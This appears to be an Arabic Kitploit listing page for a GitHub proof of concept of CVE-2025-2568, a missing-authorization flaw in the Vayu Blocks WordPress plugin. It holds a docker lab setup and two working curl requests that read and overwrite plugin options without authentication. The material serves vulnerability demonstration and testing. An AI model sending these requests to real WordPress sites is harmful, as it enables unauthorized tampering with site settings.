Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC_CVE-2025-2568 — إثبات مفهوم لاستغلال CVE-2025-2568، يوضح الوصول غير المصرح به وتعديل خيارات إضافة Vayu Blocks الخاصة بووردبريس عبر غياب فحوصات الصلاحيات. | Kitploit
أدوات/GitHubGitHub/shinigami-777/poc_cve-2025-2568
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubshinigami-777/poc_cve-2025-2568

PoC_CVE-2025-2568

إثبات مفهوم لاستغلال CVE-2025-2568، يوضح الوصول غير المصرح به وتعديل خيارات إضافة Vayu Blocks الخاصة بووردبريس عبر غياب فحوصات الصلاحيات.

عرض المستودع
2منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم CVE-2025-2568

نظرة عامة

إضافة Vayu Blocks – Gutenberg Blocks الخاصة بـ WordPress وWooCommerce معرضة لخطر الوصول غير المصرح به وتعديل البيانات بسبب غياب فحوصات الصلاحيات في الدالتين vayu_blocks_get_toggle_switch_values_callback وvayu_blocks_save_toggle_switch_callback في الإصدارات من 1.0.4 إلى 1.2.1. وهذا يتيح للمهاجمين غير المصادق عليهم قراءة خيارات الإضافة وتحديث أي خيار ينتهي اسم مفتاحه بـ _value.

خطوات الاستغلال

الإعداد (باستخدام docker)

  1. استنسخ المستودع واتبع الخطوات:
    root@kitploit:~
    cd vuln-wordpress
    docker-compose up -d
    
  • فك ضغط إضافة Vayu داخل مجلد wp-content/plugins.
    root@kitploit:~
    cd wp-content/plugins/
    unzip vayu-blocks.1.2.0.zip
    
    أصبحت إضافة Vayu-blocks (الإصدار 1.2.0) مثبتة الآن.
  • الاستغلال:

    1. استخدم هذا لقراءة الخيارات:
      root@kitploit:~
      curl http://localhost:8080/wp-json/vayu-blocks/v1/get-toggle-values/
      
    2. أرسل طلب POST مثل هذا لتعديل قيم الخيارات.
      root@kitploit:~
      curl -X POST http://localhost:8080/wp-json/vayu-blocks/v1/save-toggle-switch \
       -H "Content-Type: application/json" \
       -d '{"key":"container", "value":"new_value"}'
      

    فيديو الاستغلال

    wordpressexploit.webm

    تنزيل الأداة